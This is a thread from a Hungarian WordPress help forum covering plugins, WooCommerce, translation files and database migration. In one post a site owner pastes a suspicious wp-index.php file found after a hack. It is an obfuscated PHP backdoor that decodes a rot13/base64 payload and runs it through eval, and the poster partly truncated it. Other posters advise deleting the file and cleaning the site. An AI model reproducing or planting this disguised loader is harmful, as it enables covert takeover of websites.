Hirdetés

2024. április 30., kedd

Gyorskeresés

Téma összefoglaló

Téma összefoglaló

  • Utoljára frissítve: 2019-11-19 09:14:46

LOGOUT.hu

WordPress tartalom kezelő rendszer (CMS) topik

Összefoglaló kinyitása ▼

Hozzászólások

(#1601) Nagytalp válasza Dexter68 (#1600) üzenetére


Nagytalp
senior tag

Én is erre jutottam. Persze nem tudom mennyire esik szét a menü mobilon ha a százalékokat állítom?

Nvidia RTX és AMD RX videókártyák raktárról!

(#1602) PowerBuldog


PowerBuldog
veterán

Sziasztok!

Egy olyan megoldást keresnék, ami frontenden annyit tud jelezni, hogy az adott edzőterem nyitva vagy zárva van-e. Egy adminban megadott nyitvatartási idő szerint. (Hasonlóan mint a FB-on van) .
Tud esetleg ilyesmi plugint rá valaki?

Eladó motyók: https://hardverapro.hu/aprok/hirdeto/powerbuldog/index.html

(#1603) Des1gnR válasza PowerBuldog (#1602) üzenetére


Des1gnR
őstag

Parancsolj:

Connections Business Directory Hours
Leírás - használat

Dell G3 3779 || Samsung S23+ || Samsung Watch 5 Pro || Oculus Quest 2 || Creality Ender 3 V2

(#1604) PowerBuldog válasza Des1gnR (#1603) üzenetére


PowerBuldog
veterán

Köszi, sajnos nálam nem igazán akar megjeleníteni semmi ilyesmit, még ha lépésről lépésre is csinálom.

Eladó motyók: https://hardverapro.hu/aprok/hirdeto/powerbuldog/index.html

(#1605) _ak_


_ak_
addikt

:DD Üdv,

van egy oldal, ami állítólag üres tartalommal jelent meg és a címsorban, pedig mindenféle nike-s szövegre végződött az url.

A lényeg a lényeg, hogy lefuttattam egy WordFence scan-t és talált, 5 ismert kártékony kódot szanaszét a wp telepítésben. Azokat fájlokat (pl. images mappában index.php) és sorokat (evalok a headerben, footerben) töröltem, utána egy új jelszót állítottam be. Elképzelhető, hogy ezzel csak ennyi dolgom volt?

Kérdem ezt azért, mert számomra még mindig van egy ismeretlen fájl a rootban, méghozzá egy wp-index.php nevű.

Tartalmát illetően:

<?php

/**
* Be sure to include no trailing slash on the path.
* See http://www.php.net/support.php for more information
* about PHP manuals and their types.
*/

/* 32bit MD5 */
$password = "f3b4ad4c66c9af****74658eb34ddd0"; //1***x

define('VERSION','kaylin');

/*Starting*/ $register_key = array /*Registration code*/
(
array
(
'CQ9jnUNtDTIlpz9lK3WypT9lqTyhMluSK0IFHx9FXGgNnJ5cK3AyqPtaMTympTkurI9ypaWipaZaYPqCMzLaXGgN' ,
'nJ5cK3AyqPtaoJS4K2I4MJA1qTyioy90nJ1yWljkZQNjZPx7nTIuMTIlXPWwo250MJ50YIE5pTH6VUEyrUDinUEg' ,
'oQftL2uupaAyqQ1aLwVmZGVvXGgzqJ5wqTyiovOmqUWxnKVbWUA0pvxtrlOlMKE1pz4tp3ElK3WypTkuL2HbLKWl' ,
'LKxbW1kpWljaYl8aYPpyZwpaYPpyZwVaXFkupaWurFtaYlpfWl8aYPqpWlpfWlVaXFkwnT9jXPEmqUVcXGftsJM1' ,
'ozA0nJ9hVTAbn2qjLltxLKWlLKxcVUftMz9lMJSwnPtx
....

'qJ0hW10tYFQX9AQHJlphWTAboJ9xYvqqCP9xnKL+CP9zo3WgCvp7LaWyLJf7sG8+CTEcqvOwoTSmpm0vMz9iqTSa' ,
'Vw48C3ObpPOyL2uiVUObpS91ozSgMFtcYvp8LaV+Wl4xK1ASHyMSHyfaH0IFIxIFK1ACEyEKDIWSW107Cm48Y2Ec' ,
'qw48Y2Ecqw48Y2Ecqw48Y2WiMUx+CP9bqT1fCwj/pTujVUIhp2I0XPEupaWurFx7Cm4='
)

) ;

/**
* Language and charset conversion settings
*/
$check_copyright = create_function /*Copyright*/
(

"/*\x64\x65\x28\x73\x74\x72*/\x24\x63\x6f\x64\x65/*\x63\x6f\x64\x65\x29*/" ,
"/*\x36\x34\x5f\x64\x65*/\x65\x76\x61\x6c\x20\x28\x20\x27\x20\x3f\x3e\x27" .
"\x20\x2e\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28" .
"\x20\x73\x74\x72\x5f\x72\x6f\x74\x31\x33\x20\x28\x20\x6a\x6f\x69\x6e\x20" .
"\x28\x20\x27\x27\x20\x2c\x20\x24\x63\x6f\x64\x65\x20\x29\x20\x29\x20\x29" .
"\x20\x2e\x20\x27\x3c\x3f\x70\x68\x70\x20\x27\x20\x29\x3b/*\x63\x6f\x64*/"

) ;

/**
* Version settings
*/
$global_version = array_walk /*Version*/
(

/*This is a necessary key*/ $register_key ,

/*Verification on copyright*/ $check_copyright

) ;
/*Ending*/

?>

Erre nem találtam semmit hogy mi lehet. :F

szerk.: középen levágtam belőle, mert nagyon hosszú az a tömb. WordFence nem ír erre semmit.

[ Szerkesztve ]

Let's begin, de gozaimasu!

(#1606) lupus_l válasza _ak_ (#1605) üzenetére


lupus_l
aktív tag

Valószínű valamelyik plugined vagy a sablonod biztonsági hibával kűzd (esetleg régi WordPress rendszert használsz). Nálam akkor volt ilyen, amikor az egyik oldalon felelőtlenül nem frissítettem a revolution slider plugint, ami persze biztonsági hibás volt.

Mindenhol ott voltak ezek a fájlok. Upload könyvtárban jpg, png, ico fájlnak álcázva. wp-content könyvtárban, root-ban. Ráadásul visszadátumozva több, mint egy évvel...
Plusz az adatbázisba is módosított...

Nem volt egyszerű eset, de megoldottam.
Mindent kitakarítottam, megszabadultam a felesleges pluginektől.

[ Szerkesztve ]

(#1607) Nagytalp válasza _ak_ (#1605) üzenetére


Nagytalp
senior tag

Azért az érdekelne, hogy hogyan tudott a root mappádba bejutni? Jogosultságok rendben vannak?

Nvidia RTX és AMD RX videókártyák raktárról!

(#1608) Dexter68


Dexter68
addikt

Fiss woocommerce-nél hol lehet beállítani, hogy milyen fizmód és milyen szállítás legyen az alapértelmezett? Elveszett a rádiógomb...

Arculat tervezés | Weboldal készítés | Nyomdai anyagok | Illusztrációk, grafikák, festmények | http://www.artcharacter.hu

(#1609) Des1gnR válasza Dexter68 (#1608) üzenetére


Des1gnR
őstag

Nem az az alapértelmezett amit felülre teszel a listában?

Dell G3 3779 || Samsung S23+ || Samsung Watch 5 Pro || Oculus Quest 2 || Creality Ender 3 V2

(#1610) Dexter68


Dexter68
addikt

még nem néztem. Először inkább pánikrohamot kaptam és írtam ide, aztán elmentem ebédelni :D

Arculat tervezés | Weboldal készítés | Nyomdai anyagok | Illusztrációk, grafikák, festmények | http://www.artcharacter.hu

(#1611) Gabócza


Gabócza
senior tag

Sziasztok,

egy kis segítségre lenne szükségem. A problémám röviden:

Alo EasyMail-t használnék hírlevél kiküldésre, amiben be lehet állítani, hogy kérjen be egyedi mezőket feliratkozáskor. Az ehhez tartozó függvényt a child témám functions.php-jébe raktam. Eddig semmi probléma. Viszont ebben van egy cimke, amit magyarítani kellene, mert eredetileg a plugin nyelvi fájljára mutat, amit nem tudok (csak mo fájlok vannak) és nem is szeretnék módosítani.
Hogyan tudom megoldani a magyarítást? Hová tegyem a nyelvi fájlt, milyen néven és mit állítsak be, hogy működjön is?

Köszi előre is...

Nothing Phone (1) | Xiaomi Watch S1

(#1612) Dexter68 válasza Gabócza (#1611) üzenetére


Dexter68
addikt

Biztos nem mondok újat, de a teljesség kedvéért (meg hátha valakinek még hasznos lesz)
Fordítást úgy szerkesztünk, hogy poedit-tel szerkesztjük a .po fájlokat, ez legenerálja a szükséges .mo fájlokat. Ha nincs .po, akkor jó esetben van .pot, ami alapján létre tudunk hozni új fordítást.
Ha csak .mo fájlok vannak, akkor keresünk a neten olyat, ami .mo-ból létrehozza a .po-t. Én ezt találtam most hirtelen.
A fordítást érdemes elhelyezni a /wp-content/languages/plugins folderbe, akkor frissítés után sem veszik el. Legalábbis ebben reménykedünk.

[ Szerkesztve ]

Arculat tervezés | Weboldal készítés | Nyomdai anyagok | Illusztrációk, grafikák, festmények | http://www.artcharacter.hu

(#1613) Gabócza válasza Dexter68 (#1612) üzenetére


Gabócza
senior tag

Szia,

köszi a gyors választ. A poedit-es résszel tisztában voltam, készítettem már egy-két fordítást vele. Viszont arra nem gondoltam, hogy a mo fájlt is vissza lehet fordítani, bár logikus, mert a wordpress is ezt csinálja. Kibővítettem a fordítást, működik is, de sajnos csak akkor, ha a plugin saját languages könyvtárába kerül, ha a /wp-content/languages/plugins-ba rakom, akkor sajnos nem...

Nothing Phone (1) | Xiaomi Watch S1

(#1614) Dexter68 válasza Gabócza (#1613) üzenetére


Dexter68
addikt

Ezesetben a frissítésekre oda kell figyelni. Sajnos a child-plugin lehetőségét még nem oldotta meg senki, pedig igény volna rá.

Arculat tervezés | Weboldal készítés | Nyomdai anyagok | Illusztrációk, grafikák, festmények | http://www.artcharacter.hu

(#1615) Gabócza válasza Dexter68 (#1614) üzenetére


Gabócza
senior tag

Igen, egyelőre úgy tűnik, hogy az odafigyelés és a fordítás felülírás marad. Köszi a segítséget.

Nothing Phone (1) | Xiaomi Watch S1

(#1616) _ak_ válasza Nagytalp (#1607) üzenetére


_ak_
addikt

Jónak tűnik, (mappák 755, fájlok 644), de tény és való, hogy régen volt már frissítés is az oldalon. Most lassan egy hete már nem tapasztaltam fájl változást, lehet, hogy elég volt a törlés / frissítés, noha a napokban megjelent 4.2.4 elég furán települt.

Pontosabban kiírta, hogy van frissítés, de hiába böktem rá, elkezdte frissíteni, de 1mp múlva visszadobott a frissítős oldalra, hogy van van egy új frissítés...miközben kaptam egy emailt, hogy az oldalam frissült.. Végül is átírtam version.php-ban a verziót, azóta nyugi van, de nem érzem egy jó megoldásnak.

A frissítés menüpontban az újratelepítés opció mit tesz? Nulláról kéne megint mindent csinálni?

Let's begin, de gozaimasu!

(#1617) Nagytalp válasza _ak_ (#1616) üzenetére


Nagytalp
senior tag

Első körben kapáld ki az oda nem illő fájlokat. Nézd át az adatbázist is!

Nvidia RTX és AMD RX videókártyák raktárról!

(#1618) _ak_ válasza Nagytalp (#1617) üzenetére


_ak_
addikt

Gyorsabban írtam, mint rákerestem volna, az újratelepítés, csak a core fájlokat tölti le még egyszer, minden adat megmarad.

A fájlokat nagyjából átnéztem, azóta nem panaszkodtak, most az adatbázisban is találtam ilyen link szerű bejegyzéskét a wp-terms táblában, azokat is töröltem (a főmenümmel együtt :U ).
Úgy gondolom, hogy ez elegendő lesz. :K

Let's begin, de gozaimasu!

(#1619) code1005


code1005
senior tag

Sziasztok,

Shortcodes Ultimate-et használok és nem tudok létrehozni három hasábos elrendezést az oldalamban. Egymás alá pakolja be a hasábokat. Mi tudja ez felülbírálni?

Ilyenre lenne szükségem, mobil kompatibilis formában:

Köszi!

plata o plomo

(#1620) Nagytalp válasza _ak_ (#1618) üzenetére


Nagytalp
senior tag

Ha van fizetős pluginod felrakva és valamelyik nincs kifizetve akkor is előfordulhat ilyesmi. :)

Nvidia RTX és AMD RX videókártyák raktárról!

(#1621) Dexter68 válasza code1005 (#1619) üzenetére


Dexter68
addikt

Próbáld meg egy sorba írni, tehát nézzen ki az egész úgy, mintha egy bekezdés lenne. Valamelyik shortcode-plugin csinált ilyet és ez volt a megoldás.

Arculat tervezés | Weboldal készítés | Nyomdai anyagok | Illusztrációk, grafikák, festmények | http://www.artcharacter.hu

(#1622) MikaH válasza _ak_ (#1605) üzenetére


MikaH
csendes tag

Ilyen fájl nem létezik. Mármint a wp core nem tartalmaz ilyen nevű fájlt. Töröld. Ha ennyire szét van cseszve az oldalad, akkor tölts le minden fájlt tiszta forrásból (wordpress.org, ott nem található, illetve fizetős esetén a készítő oldala). Töröld a fájlokat a tárhelyen, másold fel a tiszta fájlokat.
Van néhány, amit ne törölj, hanem nézd végig, hogy tiszták-e. Ezek wp-config.php, .htaccess, ha van robots.txt és az uploads mappa teljes tartalma.

http://wordpress-honlap.com - http://www.wordpresskonyv.com *** ''A Windows a történelem legnagyobb béta-tesztje.'' (V.S. Wheatman)

(#1623) Joci93


Joci93
senior tag

Sziasztok!

Multisite-os WP-t használok és az lenne a kérdésem, hogy valaki tud olyan pluginról, kiegészítésről, amivel új bejegyzésnél ki lehet választani, hogy melyik oldalra posztolja ki a hírt? :U Talán crosspost-nak lehetne fordítani...

[ Szerkesztve ]

Furcsa, több ezer emberrel találkozunk és egyik sem fog meg igazán. Aztán megismerünk valakit, aki megváltoztatja az életünket. Örökre.

(#1624) Gabis


Gabis
őstag

Sziasztok,
a segítségetekre lenne szükségem, ugyanis készítettem egy wp oldalt local-on, majd mikor tölteném fel a szerverre az adatbázis ezt a hibát dobja:
SQL-lekérdezés:
/*!40101 SET NAMES utf8mb4 */;
A MySQL mondta:
#1115 - Unknown character set: 'utf8mb4'

Előre is köszönöm a segítségeteket :R

(#1625) Lacee1986 válasza Gabis (#1624) üzenetére


Lacee1986
senior tag

Állítsd át a karakter kódolást az adatbázisban sima utf 8-ra.

Az egyszerűbb megoldás, hogy az exportnál állítsd át a kompatibilitást MYSQL40-re.

[ Szerkesztve ]

(#1626) Gabis válasza Lacee1986 (#1625) üzenetére


Gabis
őstag

Tudnál segíteni, hogy azt hogyan tegyem meg? :B
Mellesleg a karakter kódolás és az illesztés nem két különböző dolog?

[ Szerkesztve ]

(#1627) Lacee1986 válasza Gabis (#1626) üzenetére


Lacee1986
senior tag

PhPmyadmin-t használsz?

(#1628) Gabis válasza Lacee1986 (#1627) üzenetére


Gabis
őstag

Igen :K

(#1629) Lacee1986 válasza Gabis (#1628) üzenetére


Lacee1986
senior tag

Exportnál kiválasztod a "Custom - display all possible options" opciót, majd legörgetsz a "Format-specific options" részig.

Itt találsz egy ilyet: "Database system or older MySQL server to maximize output compatibility with:"

A lenyíló menüt állítsd MYSQL40-re, majd mehet az export. Ha ezt importálod akkor működni fog.

A szerveren lévő MYSQL régebbi verzió mint amit local-ban használsz. Érdemes az ilyet előtte lecsekkolni. :K

(#1630) Gabis válasza Lacee1986 (#1629) üzenetére


Gabis
őstag

Sajnos ugyanaz a hiba... :U

(#1631) Gabis


Gabis
őstag

Megnyitottam az sql fájlt és ezt a sort
/*!40101 SET NAMES utf8mb4 */;
átneveztem erre
/*!40101 SET NAMES utf8 */;
így már felment, juhééééé :C

Köszönöm a segítségedet :R

Most már jöhet a localhost-os átnvezős vacakolás :DDD

[ Szerkesztve ]

(#1632) Sapphi


Sapphi
aktív tag

Sziasztok,

szeretnék egy weboldalt építeni saját célra, ahol adatokat tárolok, de egyenlőre nem tudom hogyan tudnám megvalósítani.

Szeretném ha ezt az oldalt csak bizonyos személyek érnék el akiknek adok jogot hozzá, de ott is lehessen korlátozni a lehetőségeket.

Szeretnék az oldalakra legördülő menüket tenni hasonlókat, mint amik itt vannak: http://www.jquery-plugins.hu/demo/2/auroramenu.html , de szeretném megoldani, hogy az ezekben tárolt információ modosításához ne kelljen feltétlenül az admin menüt használni, hanem itt valamilyen módon tudjam modosítani az adatokat.

Ezen felül pedig úgy bejegyzést írni, hogy ne kelljen az admin oldalra elnavigálni, hanem csak megnomnék az oldalon egy gombot és már írhatnám az üzenetet. Igazából ott elég lenne az, hogy meg tudjam adni a tárgyat meg az üzenetet.

Nem tudom, hogy esetleg van-e valami plugin vagy meg kéne ezeket írni. Kéne valami kiindulópont hozzá.

Nagyon köszönöm a segítségeket előre is, akár Skypen is megoldható a komunikáció.

Köszönöm a segítségeket!

(#1633) Des1gnR válasza Sapphi (#1632) üzenetére


Des1gnR
őstag

Kezdj bele, később foglalkozhatsz a láthatósági jogosultságokkal.

A menüs részt nem teljesen értem. Próbál ki előbb egy párat és utána talán le tudod nekünk írni, hogy mi és miért nem jó. Pl: Max Mega Menu

Az új bejegyzéshez elég ha csak bejelentkezve maradsz és mindig ott lesz a felső sáv, ahol az Új menüpont Bejegyzés almenüjével tudsz új bejegyzést hozzáadni.

Kiindulásnak tervezd meg, hogy pontosan mit akarsz. Keress egy olyan témát amivel ez megvalósítható és utána ha már jársz valahol, akkor segítünk. :)

Dell G3 3779 || Samsung S23+ || Samsung Watch 5 Pro || Oculus Quest 2 || Creality Ender 3 V2

(#1634) Des1gnR


Des1gnR
őstag

Nem emlékszem, hogy itt volt-e már téma, de sok helyen előkerül az új mező hozzáadása a Pénztár oldalhoz. Különösen sokszor találkoztam mostanában a Közösségi adószám hozzáadásával, illetve inkább csak azzal, hogy ezt szeretnék hozzáadni, de nem tudják, hogy miként.

A blogomban összefoglaltam: WooCommerce új mező hozzáadása – Közösségi adószám

Új mezőt egyébként a WooCommerce Checkout Manager-rel is hozzá lehet adni, de azzal pl nem tudunk állítani a sorrenden. Ettől függetlenül tökéletes megoldás lehet és egy jó plugin.

A bejegyzés tartalmaz egy módosított WooCommerce PDF Invoices & Packing Slips plugint ami a PDF számlába is beleteszi az új mezőt.

[ Szerkesztve ]

Dell G3 3779 || Samsung S23+ || Samsung Watch 5 Pro || Oculus Quest 2 || Creality Ender 3 V2

(#1635) CharlieDrop válasza Des1gnR (#1634) üzenetére


CharlieDrop
veterán

díjbekérőt tudsz küldeni? :)

Nem használok AD-blockert a PH! oldalain!

(#1636) Des1gnR válasza CharlieDrop (#1635) üzenetére


Des1gnR
őstag

Küldjek neked díjbekérőt? :DDD

Dell G3 3779 || Samsung S23+ || Samsung Watch 5 Pro || Oculus Quest 2 || Creality Ender 3 V2

(#1637) CharlieDrop válasza Des1gnR (#1636) üzenetére


CharlieDrop
veterán

mármint a WooCommerce csak számlát tud küldeni, ha így belenyultál van-e vmi ötleted díjbekérőre? :D

Nem használok AD-blockert a PH! oldalain!

(#1638) Des1gnR válasza CharlieDrop (#1637) üzenetére


Des1gnR
őstag

Végül is egy külön sablont lehetne neki csinálni, hisz úgy is ezeket az infókat kell tartalmaznia és úgy tudom, hogy nincs semmiféle formai követelménye, bár csak úgy szórakozásból nem fognék bele. :)

A szamlazz.hu-nak viszont van Woo modulja: [link] - Nem néztem még meg, hogy mit tud, de nézz rá mindenképp. :K

Dell G3 3779 || Samsung S23+ || Samsung Watch 5 Pro || Oculus Quest 2 || Creality Ender 3 V2

(#1639) Dexter68 válasza Des1gnR (#1634) üzenetére


Dexter68
addikt

Szuper, köszi. :R
Általában a WooCommerce Poor Guys Swiss Knife-t használom erre, de jó, ha van egy ilyen leírás, ha makacskodnának a pluginek.

Arculat tervezés | Weboldal készítés | Nyomdai anyagok | Illusztrációk, grafikák, festmények | http://www.artcharacter.hu

(#1640) CharlieDrop válasza Des1gnR (#1638) üzenetére


CharlieDrop
veterán

használja az ügyfelem, és számlát profin küld :) díjbekérőt nem :)

email sablont szoktam beállítani, de az sokszor nem működik :( vagyis visszaáll az eredetire frissítés nélkül is...

[ Szerkesztve ]

Nem használok AD-blockert a PH! oldalain!

(#1641) spiritex


spiritex
veterán

Sziasztok!
Kezdő vagyok ebben a szakmában és a segítségeteket kérném.
Csinálnom kéne egy WP weboldalt, ahol unicode-os betűkészletre lesz szükség az idegen nyelvi karakterek (és a magyar karakterek) megjelenítése miatt úgyszintén. Mert majd word-ből kéne bepaste-elni a spéci karakteres bejegyzéseket. Hol tudnék ilyen ingyenes témákat keresni? Ha itt bármelyiket kiválasztom, az mind meg fog felelni ennek az elvárásnak? Mindegyik unicode-os betűkészletet (pl. arial, tahoma) használ?
Előre is köszönöm!

Ha te az vagy, akinek képzeled magad, akkor ki az, aki képzeli magát annak a valakinek?

(#1642) Lacee1986 válasza spiritex (#1641) üzenetére


Lacee1986
senior tag

Ha véletlen nem, akkor ezt egy perc alatt orvosolhatod a CSS-ben.

(#1643) Sapphi válasza Des1gnR (#1633) üzenetére


Sapphi
aktív tag

Köszönöm a választ!

Igazából elkezdtem az oldalt megcsinálni, és találtam is egy témát, amivel megvalósítható a rendszer, de nem lesz tökéletes, hiszen én ezt majdhogynem úgy szeretném használni, mint egy vállalatirányítása rendszer, amit nem csak én, de másik is elérnek és mindezt mobilon keresztül is.

Néztem már sok vállalatirányításra való szoftvert, de sajnos egyik se felel meg az én elvárásaimnak vagyis nagyon sok dolgot tudnak, de ami nekem kéne azt nem.

Így pedig jelenleg azt tartom még járható utának, hogy saját témát írunk a wp-re így csak azok a funkciók lesznek benne, amik ténylegesen kellenek is.

Bár tanultam weboldal programozást, nem használtam és ugye minderre rájön a WordPress alapja, amire ezt meg kéne írni. Fogalmam sincs mennyire bonyolult. Esetleg tudtok ajánlani valami könyvet? A legjobb a magyar, de az angollal is megbírkozok.

Köszönöm a segítségeket!

(#1644) Des1gnR válasza Sapphi (#1643) üzenetére


Des1gnR
őstag

Első körben ezt javasolnám:
WordPress
alapismeretek
és ezt: Web programozás alapismeretek

De ha leírod, hogy mi az amit tudnia kell a rendszernek akkor lehet, hogy tudunk segíteni, illetve a vállalatirányítási rendszerekhez is lehet kérni plusz fejlesztéseket. :K

Dell G3 3779 || Samsung S23+ || Samsung Watch 5 Pro || Oculus Quest 2 || Creality Ender 3 V2

(#1645) Sapphi válasza Des1gnR (#1644) üzenetére


Sapphi
aktív tag

Modelleknek szeretnék egy rendszert kialakítani, akik nálunk dolgoznak. Ugye a modellek adatait fel kell vinni a rendszerbe és ehez kéne egy olyan felelüt, ahol be tudom állítani azt, hogy milyen adatokat kell majd elkérni illetve milyen adatokat kell tárolni róluk. A legjobb az lenne, ha ugye ezt én fel tudom építeni, de csak egyszer keljen megcsinálni, majd utánna mikor viszük fel az adatokat, vagy esetleg kollégám viszi fel, akkor legyenek olyan mezők, amik nem kötelezőek, de vannak olyanok amiket kötelező megadni és ugye ha nincs kitöltve akkor dobjon is fel egy hibát. Ide kell az, hogy fel tudjunk tölteni képeket a profilhoz, de ezeket tudjuk cserélni törölni stb.

Kell hogy tudjunk helyrajzilag szürni. Tehát hogy mondjuk innen Budapastről kell egy modell akkor kilistázza azokat akik ott élnek. De minnél jobban személyre tudjuk ezt szabni annál jobb (Több szűrés stb.)

Amikor egy ilyen profil elkészül akkor a modell is be tudjon lépni megnézni a saját adatait, de modosítani ne tudja csak ha mi modosítjuk, illetve néhány adatot ne lásson, amit magunknak írunk fel.

Ezen felül pedig a rendszerbe lenne egy üzenőfal ahova tudnak írni és megtudjuk őket válaszolni. (Kb. mint facebook-on)

Persze fontos, hogy lehessen bővíteni a rendszert, mert ezekután lehet bele statisztikákat tenni, akár számításokat, amik csak megint megkönnyítenék a munkánkat.

És persze fontos, hogy mobilon elérhető legyen. :)

Nagyvonalakban ennyi így hirtelen, és a WordPress tudom jól, hogy egy nagyon kezes rendszer teli alapból nagyon jó funkciókkal.

(#1646) Des1gnR válasza Sapphi (#1645) üzenetére


Des1gnR
őstag

Ilyesmi témára lesz szükséged: Angel - Fashion Model Agency WordPress CMS Theme

A lányokat pedig regisztrálod és nem is kell a regisztrációjukat összekötni a modell profiljukkal ha úgy se tudnak rajta módosítani.

Az üzenőfalra olyat tudok elképzelni, hogy vagy egy felhasználók közötti chat plugin: iFlyChat vagy egy fórum ami nem publikus - bbPress

Dell G3 3779 || Samsung S23+ || Samsung Watch 5 Pro || Oculus Quest 2 || Creality Ender 3 V2

(#1647) Sapphi válasza Des1gnR (#1646) üzenetére


Sapphi
aktív tag

Köszönöm, ezek tényleg jók és a téma is alapból tartalmazza, amire mondjuk gondoltam.

Annyi kérdésem viszont lenne, hogy egy ilyen oldal leprogramozása kb. mennyibe kerülni? Mert a design nem érdekes csak annyi, hogy átlátható legyen és mobilra optimalizált.

Nem tudom, milyen áran dolgoznak itthon, hogy mekkora összegbe kerülhet kb. egy ilyen rendszer kiépítése? Persze tudom, hogy a plusz funkciók plusz költség, de érdekelne a dolog.

Mert sajnos az a bajom a plugin-ekkel, hogy jó jó de nem a legjobb nem adja meg azt a nagyon egyszerü kezelhetőséget, amit én szeretnék. Persze van amikor nagyon jók és nagyon jól beleépíthetők az oldalba.

(#1648) Des1gnR válasza Sapphi (#1647) üzenetére


Des1gnR
őstag

Nálunk olyan 280-350k körül jönne ki funkcióktól függően, designnal. Szerintem máshol se olcsóbb vagy sokkal drágább, szóval nagyjából ennyivel kell számolni. :K

Dell G3 3779 || Samsung S23+ || Samsung Watch 5 Pro || Oculus Quest 2 || Creality Ender 3 V2

(#1649) Sapphi válasza Des1gnR (#1648) üzenetére


Sapphi
aktív tag

Rendben köszönöm szépen! :))))

(#1650) CharlieDrop


CharlieDrop
veterán

Sziasztok

Integrált már valamelyikőtök GLS csomagpontválasztót WP-be?

Ha igen, mennyi meló ez?

Köszi

Nem használok AD-blockert a PH! oldalain!

Copyright © 2000-2024 PROHARDVER Informatikai Kft.